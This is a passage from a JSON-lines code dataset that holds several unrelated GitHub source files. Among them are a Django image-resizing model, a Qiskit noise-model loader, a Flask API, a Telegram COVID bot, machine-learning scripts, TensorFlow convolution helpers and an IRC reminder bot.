1\n while start < end:\n if string[start] != string[end]:\n return False\n else:\n start += 1\n end -= 1\n return True\n","repo_name":"slail/palindrome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15224943464","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\nfrom io import BytesIO\nfrom django.core.files.storage import default_storage as storage\n# Create your models here.\n\nclass Profile(models.Model) :\n\tuser = models.OneToOneField(User, on_delete = models.CASCADE)\n\timage = models.ImageField(default = \"default.jpg\", upload_to = 'profile_pics')\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} Profile'\n\n\tdef save(self, *args, **kwargs):\n\t\tsuper().save(*args, **kwargs)\n\n\t\timg_read = storage.open(self.image.name, 'rb')\n\t\timg = Image.open(img_read)\n\n\t\tif img.height > 300 or img.width > 300 :\n\n\t\t\toutput_size = (300, 300)\n\n\t\t\timg.thumbnail(output_size)\n\n\t\t\tin_mem_file = BytesIO()\n\n\t\t\timg.convert('RGB').save(in_mem_file, format='JPEG')\n\n\t\t\timg_write = storage.open(self.image.name, 'w+')\n\n\t\t\timg_write.write(in_mem_file.getvalue())\n\n\t\t\timg_write.close\n\n\t\timg_read.close()\n\n\t\t\n\n","repo_name":"shagumnic/gameNotifyApp","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"45516861226","text":"import os\nimport pickle \n\nimport numpy as np\n\nfrom qiskit import QuantumRegister\nfrom qiskit import execute, Aer\nfrom qiskit import IBMQ\nfrom qiskit.providers.aer import noise\nfrom qiskit.ignis.mitigation.measurement import (complete_meas_cal,\n CompleteMeasFitter, \n MeasurementFilter)\n\nfrom hamiltonian import *\n\n# List of currently supported devices\nsupported_devices = [\n None, \n \"ibmq_16_melbourne\",\n \"ibmq_5_yorktown\",\n \"ibmq_burlington\",\n \"ibmq_essex\",\n \"ibmq_london\",\n \"ibmq_vigo\"\n]\n\nclass Device():\n def __init__(self, device_name=None, mitigate_meas_error=False, N_qubits=0, layout=None):\n # Default set of parameters\n self.name = device_name\n self.mitigate_meas_error = mitigate_meas_error\n self.coupling_map = None\n self.noise_model = None\n self.meas_filter = None\n self.layout = layout\n\n if layout is not None:\n assert self.name is not None, \\\n f\"Layout must None or unspecified when running without a device.\"\n if len(layout)!=N_qubits:\n error_str = f\"The length of the layout list ({len(layout)}) must match the number of qubits in use ({N_qubits}).\"\n raise ValueError(error_str)\n\n if self.name not in supported_devices: \n error_str = f\"Please given name of IBMQ machine. Options are: \\n {supported_devices}\"\n raise ValueError(error_str)\n\n # If we actually have a device to deal with, do everything else\n if self.name is not None:\n self.read_device()\n\n if self.mitigate_meas_error:\n if N_qubits <= 0:\n raise ValueError(\"Please provide number of qubits for measurement error mitigation.\")\n\n # Because there are issues with running stuff in parallel after calling Qiskit\n # for calibration, let's make things so that we can just save/load this data from a file. \n if layout is not None:\n calibration_file = f\"device_{self.name}_calibration_{N_qubits}qubits_layout-{layout}.pkl\" \n else:\n calibration_file = f\"device_{self.name}_calibration_{N_qubits}qubits.pkl\" \n\n if calibration_file not in os.listdir('devices'):\n print(f\"Calibration file not found; creating calibration file at {calibration_file}\")\n self.meas_filter = self.initialize_meas_calibration(N_qubits, layout)\n with open(\"devices/\" + calibration_file, \"wb\") as out_file:\n pickle.dump(self.meas_filter, out_file)\n else:\n print(f\"Calibration file found; reading calibration data from {calibration_file}\")\n with open(\"devices/\" + calibration_file, \"rb\") as in_file:\n self.meas_filter = pickle.load(in_file)\n \n\n\n def read_device(self):\n \"\"\" Reads in noise models for IBMQ device stored in file \n devices/device_.pk and returns a tuple containing the \n coupling map and corresponding noise model.\n \n If the file is not already populated, download and populate it.\n \"\"\"\n\n filename = f\"device_{self.name}.pk\"\n\n # Check for device information directory, create if not there\n if \"devices\" not in os.listdir(): \n os.mkdir(\"devices\")\n \n # Check for whether we have already downloaded device information \n if filename not in os.listdir('devices'):\n # Log into IBMQ using stored account information \n provider = IBMQ.load_account()\n provider.backends()\n\n # get device information \n device = provider.get_backend(self.name)\n properties = device.properties()\n\n # Get coupling map and noise model \n coupling_map = device.configuration().coupling_map\n noise_model = noise.NoiseModel.from_backend(properties)\n\n # Write tuple contianing coupling map and noise model (converted to dictionary) to file \n device_write = (coupling_map, noise_model.to_dict())\n\n with open(f'devices/{filename}','wb') as out_file:\n doc = pickle.dump(device_write, out_file)\n\n # Read data from the file\n with open(f'devices/{filename}', 'rb') as in_file:\n coupling_map, model_dict = pickle.load(in_file)\n\n # Reconstruct noise model from dictionary\n noise_model = noise.noise_model.NoiseModel.from_dict(model_dict)\n\n # Now, we set the class variables\n self.coupling_map = coupling_map\n self.noise_model = noise_model\n\n\n def initialize_meas_calibration(self, N_qubits, layout):\n \"\"\" Set up the confusion matrix needed for measurement error mitigation.\n This is basically just boilerplate code from the Ignis Github\n https://github.com/Qiskit/qiskit-ignis\n \"\"\"\n if layout is None:\n cal_q = QuantumRegister(N_qubits)\n meas_cals, state_labels = complete_meas_cal(qr=cal_q)\n else:\n meas_cals, state_labels = complete_meas_cal(qubit_list=layout)\n\n # Run the calibration circuits with the device noise model\n backend = Aer.get_backend('qasm_simulator')\n job = execute(meas_cals, backend=backend, shots=10000, noise_model=self.noise_model)\n cal_results = job.result()\n\n return CompleteMeasFitter(cal_results, state_labels).filter\n","repo_name":"glassnotes/GrayCode-QubitEncoding","sub_path":"src/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"37819948203","text":"from flask import Flask, jsonify, request\nfrom model.requesthandler import RequestHandler\nfrom model.validator import Validator\nimport os\nrequest_handler = RequestHandler(os.path.abspath('config.ini'))\nvalidator = Validator()\napp = Flask(__name__)\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n\n\n@app.route(\"/api/ping\")\ndef ping():\n return jsonify({\"success\": True}), 200\n\n@app.route(\"/api/posts\")\ndef posts():\n tags = request.args.get('tags')\n if tags == None or tags.strip(' ') == '':\n return jsonify({\"error\": 'Tag parameter is required'}), 400\n sortBy = request.args.get('sortBy')\n direction = request.args.get('direction')\n if sortBy:\n if not (validator.v_sortBy(sortBy)):\n return jsonify({\"error\": \"sortBy parameter is invalid\"}), 400\n if direction:\n if not (validator.v_direction(direction)):\n return jsonify({\"error\": 'direction parameter is invalid'}), 400\n posts = request_handler.get_posts(tags.split(','))\n sorted_posts = list(map(lambda post: post.data, request_handler.sort_posts(posts, sortBy, direction)))\n return jsonify({\"posts\" : sorted_posts}), 200\n\n@app.route(\"/api/authors\")\ndef authors():\n return jsonify({\"authors\": request_handler.get_author_data()}), 200\n","repo_name":"MostafaNW/blog-backend","sub_path":"testapp.py","file_name":"testapp.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9648412099","text":"# Telegram: @ZumbiPy __ _ ___\n# /_ / __ ____ _ / / (_) _ \\__ __\n# / /_/ // / ' \\/ _ \\/ / ___/ // /\n# /___/\\_,_/_/_/_/_.__/_/_/ \\_, /\n# E-mail: zumbipy@gmail.com /___/\n\"\"\"\n4 - Supondo que a população de um país A seja da ordem de 80000 habitantes\ncom uma taxa anual de crescimento de 3% e que a população de B seja 200000\nhabitantes com uma taxa de crescimento de 1%. Faça um programa que\ncalcule e escreva o número de anos necessários para que a população do país\nA ultrapasse ou iguale a população do país B, mantidas as taxas de crescimento.\n\"\"\"\n# ================================================================================\n# Variáveis do programa\n# ================================================================================\nhabitantes_a = 80000\nhabitantes_b = 200000\nanos = 0\n\n# ================================================================================\n# Logica do programa\n# ================================================================================\nwhile habitantes_a <= habitantes_b:\n crescimento_p_a = 80000 * 0.03\n crescimento_p_b = 200000 * 0.01\n anos += 1\n habitantes_a, habitantes_b = habitantes_a + crescimento_p_a, habitantes_b + crescimento_p_b\n\nprint(\"Vai leva {} anos.\".format(anos))\n\nimpr","repo_name":"zumbipy/PythonExercicios","sub_path":"EstruturaDeRepeticao/estruturaderepeticao-04.py","file_name":"estruturaderepeticao-04.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13367896506","text":"fname = input(\"Enter a file name: \")\ntry:\n fhand = open(fname, \"r\")\nexcept:\n print('File cannot be opened: ', fname)\n quit()\n\ncount = 0\naverage = 0\ntotal = 0\nfor line in fhand:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n pos = line.find(' ')\n number = line[pos:].rstrip()\n number = float(number)\n count = count + 1\n total = total + number\n average = total / count\n\nprint(average)\n","repo_name":"tjudarbe/Learning-Python","sub_path":"Ex7.2.py","file_name":"Ex7.2.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24734319427","text":"import math\nimport telebot\nfrom telebot import types\nfrom CovidTracker import CovidTracker\n\nTOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\nbot = telebot.TeleBot(TOKEN)\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n btn1 = types.KeyboardButton('Во всём мире')\n btn2 = types.KeyboardButton('Беларусь')\n btn3 = types.KeyboardButton('Россия')\n btn4 = types.KeyboardButton('Украина')\n markup.add(btn1, btn2, btn3, btn4)\n\n replyMsg = 'Привет ' + message.from_user.first_name + '\\n' \\\n 'Я бот Covid Tracker - слежу за данными по коронавирусу.\\n' \\\n '\\nКак пользоваться\\n' \\\n 'Напиши название страны, к примеру США или Германия, ' \\\n 'и я ра��скажу, как там обстоят дела. В ответ на В мире сообщу данные по всему миру. ' \\\n 'Популярные страны видны на кнопках.\\n' \\\n '\\nМои команды\\n' \\\n '/start - вновь покажет это сообщение\\n' \\\n '/list - список стран, за которыми я слежу\\n' \\\n '/info - о точности, источниках и прочем\\n' \\\n '\\nИсточник данных: JHU CSSE'\n bot.send_message(message.chat.id, replyMsg, parse_mode='html', reply_markup=markup)\n\n\n@bot.message_handler(commands=['info'])\ndef send_welcome(message):\n replyMsg = 'Источники\\n' \\\n 'Основной источник данных - CSSE Data Repository at Johns Hopkins University, ' \\\n 'который является репозиторием данных, предоставленных WHO, ECDC, US CDC и другими организациями.\\n' \\\n '\\nТочность\\n' \\\n 'По разным причинам не по всем странам есть возможность получить точные и актуальные данные, ' \\\n 'и иногда возникает ситуация, когда для некоторых стран данные либо отсутствуют, ' \\\n 'либо не актуальны.\\n' \\\n '\\nВыбор страны\\n' \\\n 'Страну можно выбрать несколькими способами:\\n' \\\n '1. По названию на русском — Япония\\n' \\\n '2. По английскому названию — Japan\\n' \\\n '3. По двухбуквенному коду (ISO 3166) — JP\\n' \\\n 'Для некоторых стран существуют алиасы: США, Америка, Соединенные Штаты ' \\\n '— всё это одна страна'\n bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(commands=['list'])\ndef send_welcome(message):\n tracker = CovidTracker()\n countriesList = tracker.getCountriesList()\n\n # Long names\n countriesLongList = [];\n for name in countriesList:\n if len(name) > 18:\n countriesLongList.append(name)\n countriesList.remove(name)\n\n height = math.ceil(len(countriesList) / 2)\n\n i = 0\n str = ''\n while i < height:\n if len(countriesList[i]) < 18:\n pad = 0\n else:\n pad = 1\n\n str += \"{:<18}\".format(countriesList[i])\n\n if pad:\n str += '\\n'\n try:\n if pad:\n str += \"{:<18}\".format(' ')\n str += countriesList[i + height]\n except:\n pass\n str += '\\n'\n i += 1\n\n for name in countriesLongList:\n str += name + '\\n'\n\n replyMsg = 'Вот список стран, за которыми я слежу:\\n
    ' + str + '
    '\n bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(content_types=['text'])\ndef mess(message):\n replyMsg = ''\n userText = message.text.strip().lower()\n userText = userText.replace('ё', 'е')\n tracker = CovidTracker()\n\n # World data\n if userText in ['во всем мире', 'в мире', 'по всему миру', 'по миру', 'мир', 'world']:\n data = tracker.getData('world', 'text')\n replyMsg += 'Данные по всему миру:\\n' \\\n '
    --------------------------------\\n' \\\n                    + data + '
    '\n\n # Country data\n else:\n country = tracker.processCountryName(userText)\n if not country:\n replyMsg = 'Страна \"' + message.text + '\" не найдена\\n'\n else:\n data = tracker.getData(country['code'], 'text')\n replyMsg = 'Данные по стране ' + country['name'] + ':\\n' \\\n '
    --------------------------------\\n' \\\n                       + data + '
    '\n\n bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n bot.reply_to(message, 'Не пойму что это значит')\n\n\nbot.polling(none_stop=True)\n","repo_name":"decss/CovidTrackerBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"66712797","text":"from typing import List\nimport heapq\n\n\ndef is_ascending(A):\n for i in range(0, len(A[0])):\n previous = 'a'\n for s in A:\n if s[i] < previous:\n return i\n previous = s[i]\n return -1\n\n\ndef minDeletionSize2(A: List[str]) -> int:\n init = len(A[0])\n it_is_not = is_ascending(A)\n while it_is_not != -1:\n for i in range(0, len(A)):\n A[i] = A[i][:it_is_not] + A[i][it_is_not + 1:]\n i += 1\n it_is_not = is_ascending(A)\n return init - len(A[0])\n\n\ndef minDeletionSize(A: List[str]) -> int:\n res = set()\n for j in range(len(A[0])):\n for i in range(len(A) - 1):\n if A[i][j] > A[i + 1][j]:\n res.add(j)\n break\n\n return len(res)\n\n\nprint(minDeletionSize([\"cba\", \"daf\", \"ghi\"]))\nprint(minDeletionSize([\"a\", \"b\"]))\nprint(minDeletionSize([\"zyx\", \"wvu\", \"tsr\"]))\n\n\ndef twoCitySchedCost(costs: List[List[int]]) -> int:\n a_or_b = []\n res = 0\n\n for cost in costs:\n if cost[0] < cost[1]:\n a_or_b.append(0)\n res += cost[0]\n else:\n a_or_b.append(1)\n res += cost[1]\n\n times = sum(a_or_b) - len(a_or_b) // 2\n if times == 0:\n return res\n\n updated_costs = []\n for i in range(0, len(costs)):\n if (times > 0 and a_or_b[i] == 1) or (times < 0 and a_or_b[i] == 0):\n updated_costs.append(costs[i])\n\n diff = []\n for cost in updated_costs:\n heapq.heappush(diff, abs(cost[0] - cost[1]))\n\n times = abs(times)\n for i in range(0, times):\n res += heapq.heappop(diff)\n\n return res\n\n\nprint(twoCitySchedCost([[10, 20], [30, 200], [400, 50], [30, 20]]))\nprint(twoCitySchedCost([[259, 770], [448, 54], [926, 667], [184, 139], [840, 118], [577, 469]]))\nprint(twoCitySchedCost(\n [[518, 518], [71, 971], [121, 862], [967, 607], [138, 754], [513, 337], [499, 873], [337, 387], [647, 917],\n [76, 417]]))\n","repo_name":"benoitantelme/pythonstuff","sub_path":"leetcode/easy/GreedyExercises.py","file_name":"GreedyExercises.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73891050661","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.metrics import explained_variance_score as evs\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor, BaggingRegressor, HistGradientBoostingRegressor\r\n\r\n# Data Import\r\ndf = pd.read_csv('mobile_prices_2023.csv')\r\ndf = df.drop('Phone Name', axis=1)\r\n\r\n\r\n# EDA & Preproccesing\r\nprint(df.info(), ('=' * 100))\r\n\r\nprint(df.isnull().sum(), ('=' * 100))\r\ndf.dropna(inplace= True)\r\n\r\n\r\n# Label Encoder\r\nle = LabelEncoder()\r\n\r\nfor c in df.columns:\r\n if df[c].dtype == 'object' :\r\n df[c] = le.fit_transform(df[c])\r\n \r\nprint(df.dtypes, ('=' * 100))\r\n\r\n\r\n# Train Test Split\r\nfeatures = df.drop('Price in INR', axis= 1)\r\ntarget = df['Price in INR']\r\n\r\nprint(features, ('=' * 100), target, ('=' * 100))\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(features, target, test_size= 0.24, random_state= 42)\r\n\r\n\r\n# Model Training\r\nmodels = [RandomForestRegressor(n_estimators=100, max_features= 100), BaggingRegressor(), HistGradientBoostingRegressor()]\r\n\r\nfor m in models:\r\n m.fit(X_train, Y_train)\r\n\r\n pred_train = m.predict(X_train)\r\n print(m, (('<>' * 25) * 3),f'\\nTrain Accuracy is : {evs(Y_train, pred_train)}')\r\n\r\n pred_test = m.predict(X_test)\r\n print(f'\\nTest Accuracy is : {evs(Y_test, pred_test)}')\r\n","repo_name":"kynivv/Smartphone_Price_Predictor_ML","sub_path":"Smartphone_Price_Predictor_ML/Model_Training.py","file_name":"Model_Training.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18073906245","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 12 12:03:04 2023\r\n\r\n@author: saksh\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n\r\ndata=pd.read_csv(\"10iris.csv\")\r\nX=data.iloc[:,:-1].values\r\ny=data.iloc[:,-1].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc=StandardScaler()\r\nX_train=sc.fit_transform(X_train)\r\nX_test=sc.transform(X_test)\r\n\r\nfrom sklearn.svm import SVC\r\nclf=SVC(kernel=\"linear\",random_state=0,)\r\n\r\nclf.fit(X_train,y_train)\r\npred=clf.predict(X_test)\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import accuracy_score,confusion_matrix\r\nprint(metrics.accuracy_score(y_test, pred))\r\nprint(metrics.confusion_matrix(y_test, pred))\r\nprint(metrics.recall_score(y_test, pred,average=\"weighted\"))\r\nprint(metrics.precision_score(y_test, pred,average=\"weighted\"))\r\n\r\n","repo_name":"sakz02/ml-6thsem","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18319446749","text":"######## ops\nimport math\nimport tensorflow as tf\ndef conv(name,x,ker_size,outs,s,cur_bin_m,mask_convd,new_bin_m,if_bn=True):\n ker = int(math.sqrt(ker_size))\n x_shape = [i.value for i in x.get_shape()]\n with tf.variable_scope(name):\n w = tf.get_variable('w',\n [ker,ker,x_shape[-1],outs],\n tf.float32,\n tf.initializers.truncated_normal(stddev=0.02))\n b = tf.get_variable('b',\n [outs],\n tf.float32,\n tf.initializers.constant(0.))\n return (tf.nn.conv2d(x*cur_bin_m,w,[1,s,s,1],\"SAME\")*mask_convd+b)*new_bin_m\n \ndef ins_norm(name,x,new_bin_m):\n with tf.variable_scope(name):\n x_ins = tf.contrib.layers.instance_norm(x)\n return x_ins*new_bin_m\n \ndef relu(name,x):\n with tf.variable_scope(name):\n return tf.nn.relu(x)\n \ndef tanh(name,x):\n with tf.variable_scope(name):\n return tf.nn.tanh(x)\n\ndef conv_up(name, in1, in1_mask, in2, in2_mask, maskconvd, masknewbin, ker_size, outs, s):\n ker = int(math.sqrt(ker_size))\n in_ch = [i.value for i in in1.get_shape()][-1] + [i.value for i in in2.get_shape()][-1]\n hi = [i.value for i in in1.get_shape()][1]\n with tf.variable_scope(name):\n in_up = tf.image.resize_images(in1,\n [int(2*hi),int(2*hi)], \n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n w = tf.get_variable('w',\n [ker,ker,in_ch,outs],\n tf.float32,\n tf.initializers.truncated_normal(stddev=0.02))\n b = tf.get_variable('b',\n [outs],\n tf.float32,tf.initializers.constant(0.))\n \n return (tf.nn.conv2d(tf.concat([in_up*in1_mask,in2*in2_mask],3),w,[1,s,s,1],\"SAME\")*maskconvd+b)*masknewbin\n","repo_name":"Rongpeng-Lin/PConv_in_tf","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"23749227975","text":"import pandas as pd\nfrom datetime import datetime\n\nfrom vikur import Vikur\n\ndef highlight_cells(M, x):\n\n # Litir í stundatöflu\n colors = ['#CC99FF','#660066','#33CCCC','#FFFFCC','#99CCFF','#FF6600',\n '#003366','#99CC00','#003300','#808080','#FFCC99','#FFFF99',\n '#0000FF','#0066CC','#9999FF','#969696','#CCFFFF','#00CCFF',\n '#FFFF00','#00FF00','#00FFFF','#C0C0C0','#008080','#808000',\n '#666699','#800080','#993366','#800000','#333333','#FF9900',\n '#CCFFCC','#FF0000','#000080','#333300','#FF99CC','#FFCC00',\n '#339966','#FF00FF','#CCCCFF','#3366FF','#993300','#FF8080',\n '#333399','#008000']\n\n color_table = dict()\n for i, namskeid in enumerate(sorted(list(set(M.klinik).union(M.val_listi)))):\n color_table.update({ namskeid: colors[i % len(colors)] })\n\n df = x.copy()\n df.loc[:,:] = ''\n for nemandi in x.index:\n for v in x.columns:\n t = x.loc[nemandi, v]\n if isinstance(t, str):\n if t in color_table:\n if t in M.klinik_vikur:\n for w in M.klinik_vikur[t][v]:\n df.loc[nemandi,w] = f'background-color: {color_table[t]}'\n else:\n for w in M.val_vikur[t]:\n df.loc[nemandi,w] = f'background-color: {color_table[t]}'\n return df\n\n# Ár frá viku\ndef arv(a, v, mid):\n if v < mid:\n return a+1\n return a\n\n# Dagsetning frá ári og viku, mánudagur\ndef dags_upphaf(a, v, mid):\n return datetime.strptime(f'{arv(a, v, mid)}-{v}-1', '%Y-%W-%w').strftime('%d/%m/%Y')\n\n# Dagsetning frá ári og viku, sunnudagur\ndef dags_lok(a, v, mid):\n return datetime.strptime(f'{arv(a, v, mid)}-{v}-0', '%Y-%W-%w').strftime('%d/%m/%Y')\n\ndef generate_excel(M, x, year, out_dir):\n V = Vikur()\n\n # MRS-leg skjöl\n\n mid = 25\n\n for c in M.klinik:\n df = pd.DataFrame(columns=['Fullt nafn nema', 'Kennitala', 'Kyn', 'Netfang',\n 'Farsími', 'Þjóðerni (ISO kóði)', 'Starfsheiti (kóði)',\n 'Kennitala leiðbeinanda', 'Deild (viðfang)', 'Frá',\n 'Til', 'Dagar/viku', 'Athugasemd',\n 'Námstig (GYMNASIUM, GRADUATE, POSTGRADUATE',\n 'Skóli (kóði/nafn)',\n 'Námsgráða (ef postgrad) (ss. CP, Diploma, MD, MPH, EDS',\n 'Aðalnámsgrein (kóði/nafn)', 'Sérnámsgrein (kóði/nafn)',\n 'Land erlends skóla (ISO kóði)', 'Samtök (kóði/nafn)',\n 'Áætluð útskrift', 'Nemandi hefur undirritað þagnarheiti',\n 'Nemandi hefur undirritað reglur um notkun sjúkraskrárupplýsinga',\n 'Auðkenniskort hefur verið afgreitt',\n 'Nemandi þarf tölvuaðgang',\n 'Nemandi hefur farið í heilbrigðisviðtal',\n 'Nemandi þarf mynd í auðkenniskort',\n 'Nemandi þarf auðkenniskort',\n 'Nemandi sækir auðkenniskort til skrifstofu',\n 'Nemandi sækir auðkenniskort til umsjónarmanns',\n 'Ónotað', 'Deild', 'Deildarstjóri',\n 'Netfang (deild)', 'Símanúmer'])\n i = 1\n for w in sorted(V.raun.keys()):\n v = V.raun[w]\n if v in M.klinik[c] and len(M.klinik[c][v]) > 0:\n df.loc[i] = { 'Fullt nafn nema': f'Vika {v}' }\n i += 1\n for d in M.klinik[c][v]:\n skradir = 0\n for s in M.nemendur:\n if x[s,c,v,d].X > 0:\n upphafsvika = min(M.klinik_vikur[c][v])\n lokavika = max(M.klinik_vikur[c][v])\n skradir += 1\n df.loc[i] = { 'Fullt nafn nema': M.nemendur[s].nafn.title(),\n 'Kennitala': M.nemendur[s].kennitala,\n 'Netfang': M.nemendur[s].netfang,\n 'Farsími': M.nemendur[s].farsimi,\n 'Deild (viðfang)': M.klinik[c][v][d].vidfang,\n 'Frá': dags_upphaf(year, upphafsvika, mid),\n 'Til': dags_lok(year, lokavika, mid),\n 'Deild': M.klinik[c][v][d].heiti,\n 'Deildarstjóri': M.klinik[c][v][d].stjori.title(),\n 'Netfang (deild)': M.klinik[c][v][d].netfang,\n 'Símanúmer': M.klinik[c][v][d].simanumer }\n i += 1\n while skradir < M.klinik[c][v][d].plass:\n skradir += 1\n df.loc[i] = { 'Fullt nafn nema': '',\n 'Kennitala': '',\n 'Netfang': '',\n 'Farsími': '',\n 'Deild (viðfang)': M.klinik[c][v][d].vidfang,\n 'Frá': dags_upphaf(year, upphafsvika, mid),\n 'Til': dags_lok(year, lokavika, mid),\n 'Deild': M.klinik[c][v][d].heiti,\n 'Deildarstjóri': M.klinik[c][v][d].stjori.title(),\n 'Netfang (deild)': M.klinik[c][v][d].netfang,\n 'Símanúmer': M.klinik[c][v][d].simanumer }\n i += 1\n df.to_excel(f'{out_dir}/mrs_radad_{c}.xlsx')\n\n # Allar skráningar\n # Reikna síðustu viku í klíník fyrir hvern nemanda\n sidasta_vika = dict()\n sidasta_vika_serstakt = { s: dict() for s in M.nemendur }\n\n # Normaliserar vikur; raðar þeim frá 0 eftir röð innan skólaárs\n allar_vikur = M.vikur.copy()\n for c in M.klinik_vikur:\n for w in M.klinik_vikur[c]:\n allar_vikur = allar_vikur | M.klinik_vikur[c][w]\n for c in M.val_vikur:\n allar_vikur = allar_vikur | set(M.val_vikur[c])\n\n vikur_fyrir = { v for v in allar_vikur if v > mid }\n vikur_eftir = { v for v in allar_vikur if v < mid }\n vikur_radadar = [v for v in vikur_fyrir] + [v for v in vikur_eftir]\n\n nemindex = ['Dagsetning'] + list(M.nemendur.keys())\n nemcols = ['Nafn'] + vikur_radadar\n\n stundatafla = pd.DataFrame('', index=nemindex, columns=nemcols)\n\n for col in stundatafla.columns:\n if col == 'Nafn':\n stundatafla[col] = [''] + [M.nemendur[s].nafn for s in stundatafla.index if s != 'Dagsetning']\n else:\n stundatafla[col]['Dagsetning'] = dags_upphaf(year, col, mid)\n\n # Valnámskeið\n for s in M.nemendur:\n for c in M.val_nemenda[s]:\n if M.val_nemenda[s][c] > 0:\n for v in M.val_vikur[c]:\n stundatafla.loc[s,v] = f'{c}'\n\n # Klínísk námskeið\n for s in M.nemendur:\n for c in M.klinik:\n for v in M.klinik[c]:\n if v > 0:\n for d in M.klinik[c][v]:\n if x[s,c,v,d].X > 0:\n # Þurfum víst ekki deild\n # stundatafla.loc[s,v] = f'{c} ({d})'\n stundatafla.loc[s,v] = f'{c}'\n if s not in sidasta_vika:\n sidasta_vika[s] = v\n else:\n if V.sym[v] > V.sym[sidasta_vika[s]]:\n sidasta_vika[s] = v\n sidasta_vika_serstakt[s][c] = v\n\n for s in M.nemendur:\n if s not in sidasta_vika:\n sidasta_vika[s] = 0\n\n stundatafla_lit = stundatafla.style.apply(lambda x: highlight_cells(M, x), axis=None)\n stundatafla_lit.to_excel(f'{out_dir}/stundatafla.xlsx')\n\n # Skráningar\n skraningar = pd.DataFrame(index=M.klinik, columns=vikur_radadar)\n\n for s in M.nemendur:\n for c in M.klinik:\n for v in M.klinik[c]:\n if v >= 0:\n for d in M.klinik[c][v]:\n if x[s,c,v,d].X > 0:\n if pd.isna(skraningar.loc[c,v]):\n skraningar.loc[c,v] = 1\n else:\n skraningar.loc[c,v] += 1\n\n for v in skraningar.columns:\n for c in skraningar.index:\n if v >= 0 and not pd.isna(skraningar.loc[c,v]):\n skraningar.loc[c,v] = f'{skraningar.loc[c,v]} / {sum(M.klinik[c][v][d].plass for d in M.klinik[c][v])}'\n\n skraningar.to_excel(f'{out_dir}/skraningar.xlsx')","repo_name":"Tomasingi/HVS_dist","sub_path":"lib/excel_generator.py","file_name":"excel_generator.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"is","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43216782219","text":"import re\nimport heapq\nimport logging\n\nfrom datetime import datetime, timedelta\n\nfrom classes import Message\nfrom behaviour import framework\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Heap:\n _heap = []\n\n def push(self, value):\n heapq.heappush(self._heap, value)\n\n def pop(self):\n return heapq.heappop(self._heap)\n\n\n@framework.command('remind', split_arguments=False)\ndef _command(message, arguments, state):\n\n match = re.fullmatch(\n r'^(.+) (in|on|at) (.+) with \"(.+)\"',\n arguments\n )\n\n if match:\n if not state.subscriptions:\n state.subscriptions = Heap()\n\n who = match.group(1)\n if who == 'me':\n who = message.origin\n\n preposition = match.group(2)\n when = match.group(3)\n try:\n if preposition == 'in':\n when = when.split(':')\n when = datetime.now() + timedelta(hours=int(when[0]),\n minutes=int(when[1]))\n elif preposition == 'on':\n when = datetime.strptime('%Y-%m-%d', when)\n elif preposition == 'at':\n now = datetime.now()\n when = when.split(':')\n\n now.hour = int(when[0])\n now.minute = int(when[0])\n\n when = now\n except Exception as e:\n logger.exception(e)\n yield Message.privmsg(message.recipient, message.origin\n + ': Come again?')\n return\n\n what = match.group(4)\n\n state.subscriptions.push((when, who, preposition, what))\n\n yield Message.privmsg(message.recipient, message.origin\n + ': You betcha')\n\n \n@framework.passive_with_command(_command)\ndef run(message, state):\n if state.subscriptions:\n try:\n when, who, 